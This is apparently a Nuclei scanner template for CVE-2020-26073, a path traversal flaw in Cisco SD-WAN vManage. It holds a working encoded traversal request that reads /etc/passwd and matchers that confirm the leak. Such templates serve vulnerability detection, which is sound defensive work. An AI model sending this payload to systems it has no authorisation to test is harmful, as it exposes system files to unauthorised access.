id: CVE-2020-26073

info:
  name: Cisco SD-WAN vManage Software - Local File Inclusion
  author: madrobot
  severity: high
  description: |
    Cisco SD-WAN vManage Software in the application data endpoints is vulnerable to local file inclusion which could allow an unauthenticated, remote attacker to gain access to sensitive information.
  impact: |
    An attacker can exploit this vulnerability to read sensitive files on the affected system.
  remediation: |
    Apply the latest security patches provided by Cisco to fix the vulnerability.
  reference:
    - https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-vman-traversal-hQh24tmk.html
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26073
  classification:
    cve-id: CVE-2020-26073
  metadata:
    max-request: 1
  tags: cve,cve2020,cisco,lfi

http:
  - method: GET
    path:
      - "{{BaseURL}}/dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: regex
        regex:
          - "root:.*:0:0:"
        part: body
# digest: 4a0a00473045022039766848e039513d1de75fa4526a5cd9bd3ee54b8e0204e824e5e3f2a4abd8340221008795b9f415bd03ded961e86016a7a3f2d3546ccc02c4aa1b9afaf7550bb1adbc:922c64590222798bb761d5b6d8e72950